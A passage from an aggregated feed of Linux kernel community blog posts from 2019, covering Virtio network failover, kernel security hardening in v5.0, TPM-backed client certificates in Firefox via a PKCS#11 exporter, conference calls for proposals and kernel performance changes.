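To give a flavour of the interface, the patches under review paired the two devices on the QEMU command line roughly as follows (illustrative only; the property names were still subject to change at the time):

qemu-system-x86_64 ... \
    -netdev tap,id=hostnet0,vhost=on \
    -device virtio-net-pci,netdev=hostnet0,id=net1,mac=52:54:00:12:34:56,failover=on \
    -device vfio-pci,host=02:00.1,failover_pair_id=net1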

Packet filtering issues

Early implementations of the failover in QEMU were tested with an emulated NIC. When tested on a physical one, it was quickly discovered that significant downtime occurs in many configurations.

The reason has to do with how incoming packets are processed by the host NIC. Generally, a packet is matched against some rules (e.g. the destination MAC is matched using a forwarding filter) and a decision is made to forward the packet either to the hypervisor or to a guest through a VF.

[Figure: incoming packet being filtered]

Consider again a hypervisor transitioning from a configuration where a primary passthrough VF is available to the guest to one where it is unavailable.

When the primary device is available to the guest, we want incoming packets with a destination MAC matching the device to be forwarded through the primary. In many configurations this happens as soon as the hypervisor programs the MAC into the VF. In these setups, when the primary device becomes unavailable to the guest, unless special steps are taken, incoming packets will still be filtered to it and eventually dropped.

[Figure: incoming packet being dropped by device]

One possible fix is to have the hypervisor update the host NIC filtering, e.g. by updating the MAC of the VF to a different value. Another is to change the filtering on the host NIC such that it only happens when a driver is attached to the VF. This seems to already be the case for some drivers (such as ice and mlx), so one can argue that others should be changed to behave consistently. Another approach would be to teach the hypervisor to detect the difference and handle both types of behaviour.

Conversely, when the primary interface becomes available to the guest, we would like packets to start flowing through the primary, but only after the driver is bound to it. Again, on some devices the hypervisor might need to intervene to update the forwarding filter on the host NIC. One issue is that it might take the guest a while to detect a hot-add event and bind a driver to the primary device, because hotplug is not generally considered a data path operation. Should the host NIC filter be updated by the hypervisor immediately on hot-add, there would be a large window during which the guest driver has not been initialized yet.

[Figure: incoming packet being dropped by driver]

As a possible fix, hypervisors can detect that the pass-through driver has been attached to device. For example, drivers enable bus-mastering on the device when they start using it, and disable it when they stop using it. Hypervisor can detect this event and update the forwarding filter on the host NIC accordingly.

QEMU patches addressing both issues have been posted on the QEMU mailing list.

An alternative could be to add a way for guest to request the switch between primary and standby through the PV device driver. This might reduce the downtime slightly: some PT drivers might enable bus mastering before they are fully ready to receive packets, causing a small window during which packets are still dropped.

This alternative approach is used by the netvsc driver. Using it with net_failover would require extending the Virtio interface and adding support to the net_failover driver in Linux; as of today no patches implementing this change have been posted.

As described above, some differences in behaviour between host NICs make the failover implementation harder. While not yet widely supported, use of VF representors could make it easier to configure host NICs consistently for use by failover. However, for this to be helpful to userspace, wide support across many NICs would be necessary.

Non-MAC based pairing

One basic question that had to be addressed early in the design was: how does the failover master decide which slave devices to bind to? Unlike bond, failover by design can not rely on the administrator supplying the configuration.

So far, implementations have focused on matching MAC addresses as a way to match slave devices. However, in some configurations (sometimes called trusted VFs) the VF MAC addresses are not supplied by the hypervisor.

This seems to call for an alternative mechanism for locating the primary that is not based on the MAC address.

The netvsc driver uses a serial number value to locate the primary device. The serial is typically communicated through the VMBus interface and attached to a para-virtual PCI bus slot created for the device. QEMU/KVM traditionally does not have a para-virtual bus implementation, relying instead on emulating a PCI bus for VMs. One possible approach for QEMU would be to attach an ID value to a PCI slot or bridge. For example, an ACPI Slot Unique Number, the PCI Physical Slot Number register, or an alternative vendor-specific ID register could fit this purpose. The ID could be supplied to the guest through the Virtio device. The failover driver would locate the slot based on the ID, bind to any device located behind the slot, and then program the MAC address from the standby device into the primary device.

An early implementation of this idea has been posted on the QEMU mailing list, however no patches to the failover driver have been posted yet.

Host network topology and other optimizations

In some configurations it might be better for the guest to use the PV interface in preference to the passthrough one. For example, if the PCI bus is very busy and there’s spare CPU capacity on the host, it might be faster to send a packet destined for another VM on the same host through the hypervisor, bypassing the PCI bus.

This seems to call for keeping both interfaces active at all times. Supporting such an optimization would need to address the possibility of VM migration as well as the dynamic nature of the available CPU and PCI bus capacity, such that the specific interface used for sending packets to each destination can change at any time.

No patches for such support have been posted as of the time of writing of this article.

Specification status

Definition of the VIRTIO_NET_F_STANDBY has been included in the latest Virtio specification draft virtio-v1.1-csprd01.

Non-Linux/non-KVM support

Besides Linux, which systems could benefit from virtual network device failover support?

The DPDK set of userspace drivers is set to gain this support soon.

Drivers for other operating systems could also benefit from increased performance. One can expect the work on these drivers to start in earnest once the hypervisor support is widely available.

Other virtual devices besides Virtio could implement failover. netvsc already has a 2-device implementation that does not rely on the net_failover driver. It is possible that xen-netfront or vmxnet devices could use the failover driver. The author is not familiar with these devices.

Summary

A straightforward-sounding idea, improving performance for a Virtio network device by allowing the VM’s networking traffic to temporarily travel over a pass-through device, exposed a wealth of issues on both the VM host and guest sides.

Acknowledgements

The author thanks Jens Freimann for help analyzing netvsc as well as proof-reading the draft and suggesting corrections. The author also thanks the multiple contributors who worked on the implementation and helped review and guide the feature design over time.

March 17, 2019 05:22 AM

March 12, 2019

Kees Cook: security things in Linux v5.0

Previously: v4.20.

Linux kernel v5.0 was released last week! Looking through the changes, here are some security-related things I found interesting:

read-only linear mapping, arm64
While x86 has had a read-only linear mapping (or “Low Kernel Mapping” as shown in /sys/kernel/debug/page_tables/kernel under CONFIG_X86_PTDUMP=y) for a while, Ard Biesheuvel has added them to arm64 now. This means that ranges in the linear mapping that contain executable code (e.g. modules, JIT, etc), are not directly writable any more by attackers. On arm64, this is visible as “Linear mapping” in /sys/kernel/debug/kernel_page_tables under CONFIG_ARM64_PTDUMP=y, where you can now see the page-level granularity:

---[ Linear mapping ]---
...
0xffffb07cfc402000-0xffffb07cfc403000    4K PTE   ro NX SHD AF NG    UXN MEM/NORMAL
0xffffb07cfc403000-0xffffb07cfc4d0000  820K PTE   RW NX SHD AF NG    UXN MEM/NORMAL
0xffffb07cfc4d0000-0xffffb07cfc4d1000    4K PTE   ro NX SHD AF NG    UXN MEM/NORMAL
0xffffb07cfc4d1000-0xffffb07cfc79d000 2864K PTE   RW NX SHD AF NG    UXN MEM/NORMAL

per-task stack canary, arm
ARM has supported stack buffer overflow protection for a long time (currently via the compiler’s -fstack-protector-strong option). However, on ARM, the compiler uses a global variable for comparing the canary value, __stack_chk_guard. This meant that everywhere in the kernel needed to use the same canary value. If an attacker could expose a canary value in one task, it could be spoofed during a buffer overflow in another task. On x86, the canary is in Thread Local Storage (TLS, defined as %gs:20 on 32-bit and %gs:40 on 64-bit), which means it’s possible to have a different canary for every task since the %gs segment points to per-task structures. To solve this for ARM, Ard Biesheuvel built a GCC plugin to replace the global canary checking code with a per-task relative reference to a new canary in struct thread_info. As he describes in his blog post, the plugin results in replacing:

8010fad8:       e30c4488        movw    r4, #50312      ; 0xc488
8010fadc:       e34840d0        movt    r4, #32976      ; 0x80d0
...
8010fb1c:       e51b2030        ldr     r2, [fp, #-48]  ; 0xffffffd0
8010fb20:       e5943000        ldr     r3, [r4]
8010fb24:       e1520003        cmp     r2, r3
8010fb28:       1a000020        bne     8010fbb0
...
8010fbb0:       eb006738        bl      80129898 <__stack_chk_fail>

with:

8010fc18:       e1a0300d        mov     r3, sp
8010fc1c:       e3c34d7f        bic     r4, r3, #8128   ; 0x1fc0
...
8010fc60:       e51b2030        ldr     r2, [fp, #-48]  ; 0xffffffd0
8010fc64:       e5943018        ldr     r3, [r4, #24]
8010fc68:       e1520003        cmp     r2, r3
8010fc6c:       1a000020        bne     8010fcf4
...
8010fcf4:       eb006757        bl      80129a58 <__stack_chk_fail>

r2 holds the canary saved on the stack and r3 the known-good canary to check against. In the former, r3 is loaded through r4 at a fixed address (0x80d0c488, which “readelf -s vmlinux” confirms is the global __stack_chk_guard). In the latter, it’s coming from offset 0x24 in struct thread_info (which “pahole -C thread_info vmlinux” confirms is the “stack_canary” field).

per-task stack canary, arm64
The lack of per-task canary existed on arm64 too. Ard Biesheuvel solved this differently by coordinating with GCC developer Ramana Radhakrishnan to add support for a register-based offset option (specifically “-mstack-protector-guard=sysreg -mstack-protector-guard-reg=sp_el0 -mstack-protector-guard-offset=...“). With this feature, the canary can be found relative to sp_el0, since that register holds the pointer to the struct task_struct, which contains the canary. I’m hoping there will be a workable Clang solution soon too (for this and 32-bit ARM). (And it’s also worth noting that, unfortunately, this support isn’t yet in a released version of GCC. It’s expected for 9.0, likely this coming May.)

top-byte-ignore, arm64
Andrey Konovalov has been laying the groundwork with his Top Byte Ignore (TBI) series which will also help support ARMv8.3’s Pointer Authentication (PAC) and ARMv8.5’s Memory Tagging (MTE). While TBI technically conflicts with PAC, both rely on using “non-VA-space” (Virtual Address) bits in memory addresses, and getting the kernel ready to deal with ignoring non-VA bits. PAC stores signatures for checking things like return addresses on the stack or stored function pointers on the heap, both to stop overwrites of control flow information. MTE stores a “tag” (or, depending on your dialect, a “color” or “version”) to mark separate memory allocation regions to stop use-after-free and linear overflows. For either of these to work, the CPU has to be put into some form of the TBI addressing mode (though for MTE, it’ll be a “check the tag” mode), otherwise the addresses would resolve into totally the wrong place in memory. Even without PAC and MTE, this byte can be used to store bits that can be checked by software (which is what the rest of Andrey’s series does: adding this logic to speed up KASan).

ongoing: implicit fall-through removal
An area of active work in the kernel is the removal of all implicit fall-through in switch statements. While the C language has a statement to indicate the end of a switch case (“break“), it doesn’t have a statement to indicate that execution should fall through to the next case statement (just the lack of a “break” is used to indicate it should fall through — but this is not always the case), and such “implicit fall-through” may lead to bugs. Gustavo Silva has been the driving force behind fixing these since at least v4.14, with well over 300 patches on the topic alone (and over 20 missing break statements found and fixed as a result of the work). The goal is to be able to add -Wimplicit-fallthrough to the build so that the kernel will stay entirely free of this class of bug going forward. From roughly 2300 warnings, the kernel is now down to about 200. It’s also worth noting that with Stephen Rothwell’s help, this bug has been kept out of linux-next by him sending warning emails to any tree maintainers where a new instance is introduced (for example, here’s a bug introduced on Feb 20th and fixed on Feb 21st).

ongoing: refcount_t conversions
There also continues to be work converting reference counters from atomic_t to refcount_t so they can gain overflow protections. There have been 18 more conversions since v4.15 from Elena Reshetova, Trond Myklebust, Kirill Tkhai, Eric Biggers, and Björn Töpel. While there are more complex cases, the minimum goal is to reduce the Coccinelle warnings from scripts/coccinelle/api/atomic_as_refcounter.cocci to zero. As of v5.0, there are 131 warnings, with the bulk of the remaining areas in fs/ (49), drivers/ (41), and kernel/ (21).
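For reference, the remaining instances can be listed in a kernel tree with the usual coccicheck invocation:

make coccicheck MODE=report COCCI=scripts/coccinelle/api/atomic_as_refcounter.cocci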

userspace PAC, arm64
Mark Rutland and Kristina Martsenko enabled kernel support for ARMv8.3 PAC in userspace. As mentioned earlier about PAC, this will give userspace the ability to block a wide variety of function pointer overwrites by “signing” function pointers before storing them to memory. The kernel manages the keys (i.e. selects random keys and sets them up), but it’s up to userspace to detect and use the new CPU instructions. The “paca” and “pacg” flags will be visible in /proc/cpuinfo for CPUs that support it.

platform keyring
Nayna Jain introduced the trusted platform keyring, which cannot be updated by userspace. This can be used to verify platform or boot-time things like firmware, initramfs, or kexec kernel signatures, etc.

Edit: added userspace PAC and platform keyring, suggested by Alexander Popov
Edit: tried to clarify TBI vs PAC vs MTE

That’s it for now; please let me know if I missed anything. The v5.1 merge window is open, so off we go! :)

© 2019, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

March 12, 2019 11:04 PM

Linux Plumbers Conference: Linux Plumbers Conference 2019 Call for Refereed-Track Proposals

We are pleased to announce the Call for Refereed-Track talk proposals for the 2019 edition of the Linux Plumbers Conference, which will be held in Lisbon, Portugal on September 9-11 in conjunction with the Linux Kernel Maintainer Summit.

Refereed track presentations are 50 minutes in length (which includes time for questions and discussion) and should focus on a specific aspect of the “plumbing” in the Linux system. Examples of Linux plumbing include core kernel subsystems, toolchains, container runtimes, core libraries, windowing systems, management tools, device support, media creation/playback, and so on. The best presentations are not about finished work, but rather problems, proposals, or proof-of-concept solutions that require face-to-face discussions and debate.

For more information on submitting a Refereed-Track talk proposal, see the following:

https://www.linuxplumbersconf.org/event/4/abstracts

Please note that the submission system is the same as in 2018. If you created a user account last year, you will be able to re-use the same credentials to submit and modify your proposal(s) this year.

The call for Microconferences proposals is also open, and we hope to see you in Lisbon this coming September!

March 12, 2019 04:22 PM

Linux Plumbers Conference: Linux Plumbers Conference 2019 Call for Microconference Proposals

We are pleased to announce the Call for Microconferences for the 2019 edition of the Linux Plumbers Conference, which will be held in Lisbon, Portugal on September 9-11 in conjunction with the Linux Kernel Maintainer Summit.

A microconference is a collection of collaborative sessions focused on problems in a particular area of the Linux plumbing, which includes the kernel, libraries, utilities, services, UI, and so forth, but can also focus on cross-cutting concerns such as security, scaling, energy efficiency, toolchains, container runtimes, or a particular use case. Good microconferences result in solutions to these problems and concerns, while the best microconferences result in patches that implement those solutions. For more information on submitting a microconference proposal, see the following:

https://www.linuxplumbersconf.org/event/4/abstracts

Please note that the submission system is the same as in 2018. If you created a user account last year, you will be able to re-use the same credentials to submit and modify your proposal(s) this year.

Look for the upcoming call for refereed-track proposals, and we hope to see you in Lisbon this coming September!

March 12, 2019 12:07 AM

March 07, 2019

Michael Kerrisk (manpages): man-pages-5.00 is released

I've released man-pages-5.00. The release tarball is available on kernel.org. The browsable online pages can be found on man7.org. The Git repository for man-pages is available on kernel.org.

This release resulted from patches, bug reports, reviews, and comments from around 130 contributors. The release is rather larger than average, since it has been nearly a year since the last release. The release includes more than 600 commits that changed nearly 400 pages. In addition, 3 new manual pages were added.

Among the more significant changes in man-pages-5.00 are the following:

In addition, two pages have been removed in this release after encouragement from Ingo Schwarze: mdoc(7) and mdoc.samples(7). As the commit message notes, groff_mdoc(7) from the groff project provides a better equivalent of mdoc.samples(7) and the mandoc project provides a better mdoc(7). And nowadays, there are virtually no pages in man-pages that use mdoc markup.

Again special thanks to Eugene Syromyatnikov, who contributed nearly 30 patches to this release!

March 07, 2019 04:57 AM

March 06, 2019

James Bottomley: Using TPM Based Client Certificates on Firefox and Apache

One of the useful features of Apache (or indeed any competent web server) is the ability to use client side certificates. All this means is that a certificate from each end of the TLS transaction is verified: the browser verifies the website certificate, and the website requires the client also to present one, which it verifies. Using client certificates linked to your own client certificate CA gives web transactions the strength of two factor authentication if you do it on the login page. I use this feature quite a lot for all the admin features of my own website. With apache it’s really simple to turn on with the

SSLCACertificateFile

directive, which allows you to specify the CA for the accepted certificates. In my own setup I have my own self signed certificate as the CA, and all the authority certificates use it as the issuer. You can turn client certificate verification on for a given location simply by doing

<Location /some/web/location>
SSLVerifyClient require
</Location>

And Apache will take care of requesting the client certificate and verifying it against the CA. The only caveat here is that TLSv1.3 currently fails to work for this, so you have to disable it with

SSLProtocol -TLSv1.3
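Putting the pieces together, a minimal illustrative vhost fragment looks something like this (the paths are examples only):

SSLEngine on
SSLCertificateFile    /etc/apache2/ssl/server.crt
SSLCertificateKeyFile /etc/apache2/ssl/server.key
SSLCACertificateFile  /etc/apache2/ssl/client-ca.crt
SSLProtocol all -TLSv1.3
<Location /admin>
    SSLVerifyClient require
</Location>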

Client Certificates in Firefox

Firefox is somewhat hard to handle for SSL because it includes its own hand written mozilla secure sockets code, which has a toolkit quite unlike any other ssl toolkit. In order to import a client certificate and key into Firefox, you need to create a pkcs12 file containing them and import that into the “Your Certificates” box, which is under Preferences > Privacy & Security > View Certificates.
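Creating that pkcs12 file in the first place is a one liner (the file names are illustrative):

openssl pkcs12 -export -inkey client.key -in client.crt -name "My Client Cert" -out client.p12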

Obviously, simply supplying a key file to Firefox presents security issues, because you’d like to prevent a clever hacker from gaining access to it and thus running off with your client certificate. Firefox achieves a modicum of security by doing all key operations over the PKCS#11 API via a software token, which should mean that even malicious javascript cannot gain access to your key, but merely to the signing API.

However, assuming you don’t quite trust this software separation, you need to store your client signing key in a secure vault like a TPM to make sure no web hacker can gain access to it. Various crypto system connectors, like the OpenSSL TPM2 and TPM2 engine, already exist, but because Firefox uses its own cryptographic code it can’t take advantage of them. In fact, the only external object the Firefox crypto code can use is a PKCS#11 module.

Aside about TPM2 and PKCS#11

The design of PKCS#11 is that it is a loadable library which can find and enumerate keys and certificates in some type of hardware device like a USB Key or a PCI attached HSM. However, since the connector is simply a library, nothing requires it to connect to something physical, and the OpenDNSSEC project actually produces a purely software based cryptographic token. In theory, then, it should be easy.

The problems come with the PKCS#11 expectation of key residency: the library allows the consuming program to enumerate a list of slots, each of which may, or may not, be occupied by a single token. Each token may contain one or more keys and certificates. Now the TPM does have a concept of a key resident in NV memory, which is directly analogous to the PKCS#11 concept of a token based key. The problems start with the TPM2 PC Client Profile, which recommends this NV area be about 512 bytes, which is big enough for all of one key and thus not very scalable. In fact, the imagined use case of the TPM is with volatile keys which are demand loaded.

Demand loaded keys map very nicely to the OpenSSL idea of a key file, which is why OpenSSL TPM engines are very easy to understand and use, but they don’t map at all into the concept of token resident keys. The closest interface PKCS#11 has for handling key files is the provisioning calls, but even there they’re designed for placing keys inside tokens and, once provisioned, the keys are expected to be non-volatile. Worse still, very few PKCS#11 module consumers actually do provisioning, they mostly leave it up to a separate binary they expect the token producer to supply.

Even if the demand loading problem could be solved, the PKCS#11 API requires quite a bit of additional information about keys, like ids, serial numbers and labels that aren’t present in the standard OpenSSL key files and have to be supplied somehow.

Solving the Key File to PKCS#11 Mismatch

The solution seems reasonably simple: build a standard PKCS#11 library that is driven by a known configuration file. This configuration file can map keys to slots, as required by PKCS#11, and also supply all the missing information. The C_Login() operation is expected to supply a passphrase (or PIN in PKCS#11 speak), so that would be the point at which the private key could be loaded.

One of the interesting features of the above is that, while it could be implemented for the TPM engine only, it can also be implemented as a generic OpenSSL key exporter to PKCS#11 that happens also to take engine keys. That would mean it would work for non-engine keys as well as any engine that exists for OpenSSL … a nice little win.

Building an OpenSSL PKCS#11 Key Exporter

A token can be built from a very simple ini-like configuration file, with the global section setting global properties, like the manufacturer id and library description, and each individual section being used to instantiate a slot containing one key. We can make the slot name, the id and the label the same if not overridden, and use key file directives to load the public and private keys. The serial number seems best constructed from a hash of the public key parameters (again, if not overridden). In order to support engine keys, the token library needs to know which engine to invoke, so I added an engine keyword to tell it.
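As a sketch, such a configuration might look like the following. The directive names here are guesses based on the description above (the real Firefox example further down shows the certificate variant), and the names and paths are illustrative:

manufacturer id = Example Exporter
library description = OpenSSL key exporter
[web-key]
public key = /home/user/web.pub
private key = /home/user/web.key
[tpm-key]
public key = /home/user/tpm.pub
private key = /home/user/tpm.key
engine = tpm2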

With that, the mechanics of making the token library work with any OpenSSL key are set, the only thing is to plumb in the PKCS#11 glue API. At this point, I should add that the goal is simply to get keys and tokens working, not to replicate a full featured PKCS#11 API, so you shouldn’t use this as something to test against for a reference implementation (the softhsm2 token is much better for that). However, it should be functional enough to use for storing keys in Firefox (as well as other things, see below).

The current reasonably full featured source code is here, with a reference build using the OpenSUSE Build Service here. I should add that some of the build failures are due to problems with p11-kit and others due to the way Debian gets the wrong engine path for libp11.

At Last: Getting TPM Keys working with Firefox

A final problem with Firefox is that there seems to be no way to import a certificate file for which the private key is located on a token. The only way Firefox seems to support this is if the token contains both the private key and the certificate. At least this is my own project, so some coding later, the token now supports certificates as well.

The next problem is more mundane: generating the certificate and key. Obviously, the safest key is one which has never left the TPM, which means the certificate request needs to be built from it. I chose a CSR type that also includes my name and my machine name for later easy discrimination (and revocation if I ever lose my laptop). This is the sequence of commands for my machine, called jarvis.

create_tpm2_key -a key.tpm
openssl req -subj '/CN=James Bottomley/UID=jarvis/' -new -engine tpm2 -keyform engine -key key.tpm -nodes -out jarvis.csr
openssl x509 -in jarvis.csr -req -CA my-ca.crt -engine tpm2 -CAkeyform engine -CAkey my-ca.key -days 3650 -out jarvis.crt

As you can see from the above, the key is first created by the TPM, then that key is used to create a certificate request where the common name is my name and the UID is the machine name (this is just my convention, feel free to use your own), and then finally it’s signed by my own CA, which you’ll notice is also based on a TPM key. Once I have this, I’m free to create an ini file to export it as a token to Firefox:

manufacturer id = Firefox Client Cert
library description = Cert for hansen partnership
[mozilla-key]
certificate = /home/jejb/jarvis.crt
private key = /home/jejb/key.tpm
engine = tpm2

All I now need to do is load the PKCS#11 shared object library into Firefox using Settings > Privacy & Security > Security Devices > Load, and I have a TPM based client certificate ready for use.

Additional Uses

It turns out once you have a generic PKCS#11 exporter for engine keys, there’s no end of uses for them. One of the most convenient has been using TPM2 keys with gnutls. Although gnutls was quick to adopt TPM 1.2 based keys, it’s been much slower with TPM2, but because gnutls already has a PKCS#11 interface using the p11-kit URI format, you can easily build a config file of all the TPM2 keys you want it to use and simply reference them by URI in gnutls.
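For example, once the exporter module is built, something like this lists the token’s objects and then uses a key directly by URI (a sketch; the module path, token name and file names are illustrative):

p11tool --provider /usr/lib64/libosslpkcs11.so --list-tokens
p11tool --provider /usr/lib64/libosslpkcs11.so --list-all
gnutls-cli --x509keyfile 'pkcs11:token=mytoken;object=web-key' --x509certfile web.crt example.com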

Unfortunately, this has also led to some problems, the biggest one being Firefox: Firefox assumes, once you load a PKCS#11 module library, that you want it to use every single key it can find, which is fine until it pops up 10 dialogue boxes each time you start it, one for each key password, particularly if there’s only one key you actually care about it using. This problem doesn’t seem solvable in the Firefox token interface, so the eventual way I did it was to add the ability to specify the config file in the environment (variable OPENSSL_PKCS11_CONF) and modify my xfce Firefox action to set this in the environment, pointing at a special configuration file with only Firefox’s key in it.

Conclusions and Future Work

Hopefully I’ve demonstrated that this simple PKCS#11 converter can be useful both for keeping Firefox keys safe and for uses in other things like gnutls. Unfortunately, it turns out that the world wide web is turning against PKCS#11 tokens as having usability problems and is moving on to something called FIDO2 tokens, which have the web browser talking directly to the USB token. In my next technical post I hope to explain how you can use the Linux Kernel USB gadget system to connect a TPM up easily as a FIDO2 token so you can use the new passwordless webauthn protocol seamlessly.

March 06, 2019 08:21 PM

March 05, 2019

Paul E. Mc Kenney: Parallel Programming: March 2018 deferred-processing query

TL;DR: Do you know of additional publicly visible production uses of sequence locking, hazard pointers, or RCU not already called out in the remainder of this blog post?

I am updating the deferred-processing chapter of “Is Parallel Programming Hard, And, If So, What Can You Do About It?” and would like to include a list of publicly visible production uses of sequence locking, hazard pointers, and RCU. I suppose I could also include reference counting, but given that it was well known before I was born, I expect that its list would be way too long to be useful!

The only production use of sequence locking that I am aware of is within the Linux kernel, but I would be surprised if it is not rather widely used. Can you tell me of more publicly visible production sequence-locking uses?

Hazard pointers is used within MongoDB (v3.0 and later) and within Facebook's Folly library, which is used in production at Facebook and perhaps elsewhere as well. It is also implemented by several libraries called out on its Wikipedia page (Concurrent Building Blocks, Concurrency Kit, Atomic Ptr Plus, and libcds). Hazard pointers is also sometimes called “safe memory reclamation” (SMR). Any other production hazard-pointers uses?

RCU is used within the Linux kernel, the FreeBSD kernel, the OpenBSD kernel, Linux Trace Toolkit Next Generation (LTTng), QEMU, Knot DNS, Netsniff-ng, Sheepdog, GlusterFS, and gdnsd. It is also implemented by several libraries, including Userspace RCU, Concurrency Kit, Facebook's Folly library, and libcds. RCU is also called “epochs” (from Keir Fraser), “generations” (from Tornado/K42), “passive serialization” (from IBM zVM), and probably other things as well. Any other production RCU uses?

So what do I mean by “publicly visible”? Open-source projects should qualify, as should scholarly publications regarding proprietary projects. Similarly, “production use” means use for getting some job done, as opposed to research, prototyping, or benchmarking. Not that there is necessarily anything wrong with research, prototyping, or benchmarking, but we are looking for things a little bit further along the hype cycle. ;-)

March 05, 2019 06:45 PM

February 28, 2019

Pete Zaitcev: Suddenly RISC-V

I knew about that thing because Rich Jones was a fan. Man, that guy is always ahead of the curve.

Coincidentally, a couple of days ago Amazon announced support for RISC-V in FreeRTOS (I have no idea how free that thing is. It's MIT licensed, but with Amazon, it might be patented up to the gills.).

February 28, 2019 07:51 PM

Pete Zaitcev: Mu accounts

Okay, here's the breakdown:

@pro: Programming, computers, networking, maybe some technical fields. It's basically migrated from SeaLion and is the main account of interest for the readers of this journal.

@stuff: Pictures of butterflies, gardening, and general banality.

@gat: Boomsticks.

@avia: Flying.

@union: Politics.

@anime: Anime, manga, and weaboo. Note that Ani-nouto is still officially at Smug.

Thinking about adding @cars and @space, if needed.

You can subscribe from any Fediverse instance, just hit the "Remote follow" button.

February 28, 2019 05:06 PM

Pete Zaitcev: Multi-petabyte Swift cluster

In a Swift numbers post in 2017, I mentioned that the largest known cluster had about 20 PB. It is 2019 now and I just got word that TurkCell is operating a cluster with 36 PB, and they are looking at growing it up to 50 PB by the end of the year. The information about its make-up is proprietary, unfortunately. The cluster was started in the Icehouse release, so I'm sure there was a lot of churn and legacy, like 250 GB drives and RHEL 6.

February 28, 2019 04:44 PM

February 26, 2019

Linux Plumbers Conference: Welcome to the 2019 Linux Plumbers Conference blog

Planning for the 2019 Linux Plumbers Conference is well underway. The planning committee will be posting various informational blurbs here, including information on hotels, microconference acceptance, evening events, scheduling, and so on. Next up will be a “call for proposals” that should appear soon.

LPC will be held at the Corinthia Hotel, Lisbon, Portugal, 9-11 September 2019, colocated with the Linux Kernel Maintainer Summit. The Linux Kernel Summit Track will very much be taking place during LPC 2019 again this year.

February 26, 2019 02:21 PM

February 25, 2019

Pete Zaitcev: Elixir of your every fear

TFW you consider an O'Reily animal-cover book and the blurb says:

Authors Simon St. Laurent and J. David Eisenberg show you how Elixir combines the robust functional programming of Erlang with an approach that looks more like Ruby, and includes powerful macro features for metaprogramming.

February 25, 2019 01:34 AM

February 24, 2019

Davidlohr Bueso: Linux v4.20: Performance Goodies

With v4.20 out for almost the entire v5.0 rc-cycle, here are some of the more interesting performance related changes that made their way in.

signal: Use a smaller struct siginfo in the kernel

Reduces the memory footprint of 'struct siginfo', most of which is just reserved space. Ultimately this shrinks the structure from spanning two cachelines to just one.
[Commit 4ce5f9c9e754]

sched/fair: Fix cpu_util_wake() for 'execl' type workloads

Fix an exec() related performance regression, which was caused by incorrectly calculating load and migrating tasks on exec() when they shouldn't have been.
[Commit c469933e7721]

locking/rwsem: Exit read lock slowpath if queue empty and no writer

This change introduces a new heuristic for optimizing rw-semaphores, specifically in read-mostly scenarios. Before the patch, a reader could find itself in the slowpath due to an occasional writer thread, but the writer would then be released, leaving only other readers present. At that point the waitqueue was enlarged unnecessarily, causing other readers attempting to lock to see waiting readers. This directly improves some issues found when (ab)using pread64() and XFS.
[Commit 4b486b535c33]

mm: mmap: zap pages with read mmap_sem in munmap

When a process unmaps a range of memory, the infamous mmap_sem would be held for the duration of the entire munmap() call, which can be a long time for big mappings (reportedly up to 18 seconds for a 320 GB mapping). A two-phase approach addresses this: unmap the VMA first, while the semaphore is held exclusively, then downgrade the semaphore so it can be shared while zapping pages and freeing page tables.
[Commit dd2283f2605e b4cefb360512 cb4922496ae4]
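
The two-phase idea maps directly onto the rwsem API. A simplified sketch follows; the real code is in mm/mmap.c and handles many more corner cases:

    /* Simplified sketch of the two-phase munmap(). */
    static int do_munmap_sketch(struct mm_struct *mm, unsigned long start,
                                unsigned long len)
    {
        down_write(&mm->mmap_sem);      /* exclusive: detach the VMAs */
        /* ... detach_vmas_to_be_unmapped() ... */

        /* The slow part no longer needs exclusion, so let readers
         * (page faults, /proc walkers) back in. */
        downgrade_write(&mm->mmap_sem);

        /* ... unmap_region(): zap pages, free page tables ... */
        up_read(&mm->mmap_sem);         /* held shared after the downgrade */
        return 0;
    }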

net/tcp: optimize tcp internal pacing

When TCP implements its own pacing (when no fq packet scheduler is used), it arms a high-resolution timer after a packet is sent. But in many cases (such as TCP_RR-style workloads), this timer expires before the application attempts to write the following packet. The fix sets up the timer only when a packet is about to be sent and tcp_wstamp_ns is in the future, showing a ~10% performance increase in TCP_RR workloads.
[Commit 864e5c090749]

fs: better member layout of struct super_block

Re-organize 'struct super_block' to try to keep frequently accessed fields on the same cache line, while grouping the rarely accessed members together. This was seen to address a regression on a concurrent unlink-intensive workload.
[Commit 99c228a994ec]

fs/fuse: improved scalability

Two changes with visible performance effects went in. The first series changes some of the protections around background requests, allowing async reads to avoid taking the fuse connection lock. The second implements a hash table for processing requests, addressing the ~20% of time spent in request_find() seen under some workloads with Virtuozzo storage over RDMA.
[Commit e287179afe21 2a23f2b8adbe 2b30a533148a ae2dffa39485 63825b4e1da5 c59fd85e4fd0 be2ff42c5d6e]
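
For the second change, the kernel's generic <linux/hashtable.h> is enough to illustrate the idea; this is not the actual fuse patch, and the structure below is made up for the example:

    #include <linux/hashtable.h>
    #include <linux/types.h>

    #define REQ_HASH_BITS 8
    static DEFINE_HASHTABLE(req_table, REQ_HASH_BITS);

    struct req_sketch {
        u64 unique;             /* request id, used as the hash key */
        struct hlist_node node;
    };

    /* O(1) on average, instead of walking a list of all requests. */
    static struct req_sketch *request_find(u64 unique)
    {
        struct req_sketch *req;

        hash_for_each_possible(req_table, req, node, unique)
            if (req->unique == unique)
                return req;
        return NULL;
    }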

February 24, 2019 11:53 PM

February 22, 2019

Pete Zaitcev: Mu!

In the past several days, I inaugurated a private Fediverse instance, "Mu", running Pleroma for now. Although Mastodon is the dominant implementation, Pleroma is far easier to install, and uses less memory on small, private instances. By doing this, I'm bucking the trend of people hating to run their own infrastructure. Well, I do run my own e-mail service, so, what the heck, might as well join the Fediverse.

So far, it has been pretty fun, but Pleroma has problem spots. For example, Pleroma has a concept of "local accounts" and "remote accounts": local ones are normal, into which users log in at the instance, and remote ones mirror accounts on other instances. This way, if users Alice@Mu and Bob@Mu follow user zaitcev@SLC, Mu creates a "remote" account UnIqUeStRiNg@Mu, which tracks zaitcev@SLC, so Alice and Bob subscribe to it locally. This permits sending zaitcev's updates over the network only once. Makes sense, right? Well... I have a "stuck" remote account now at Mu, let's call it Xprime@Mu, and posit that it follows X@SPC. Updates posted by X@SPC are reflected in Xprime@Mu, but if Alice@Mu tries to follow X@SPC, she does not see the updates that Xprime@Mu receives (the updates are not reflected in Alice's friends/main timeline) [1]. I asked at #pleroma about it, but all they could suggest was to try and resubscribe. I think I need to unsubscribe and purge Xprime@Mu somehow. Then, when Alice resubscribes, Pleroma will re-create a remote, say Xbis@Mu, and things hopefully ought to work. Well, maybe. I need to examine the source to be sure.

